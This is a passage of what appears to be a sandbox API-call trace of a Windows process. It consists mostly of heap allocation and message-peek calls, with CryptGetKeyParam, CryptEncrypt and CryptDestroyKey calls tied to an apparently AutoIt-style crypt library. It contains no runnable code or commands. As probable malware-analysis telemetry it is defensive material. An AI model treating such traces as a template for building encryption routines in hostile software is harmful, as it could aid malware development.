(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.205] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.206] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.240] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.240] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.240] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.240] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.240] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.241] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x2639, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2640) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] CharLowerBuffW (in: lpsz="byte[9793]", cchLength=0xa | out: lpsz="byte[9793]") returned 0xa [0030.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.242] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.242] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b4c50*, pdwDataLen=0x6ae220*=0x2639, dwBufLen=0x2640 | out: pbData=0x8b4c50*, pdwDataLen=0x6ae220*=0x2640) returned 1 [0030.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.242] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.245] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.245] CryptDestroyKey (hKey=0x7c2280) returned 1 [0030.245] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 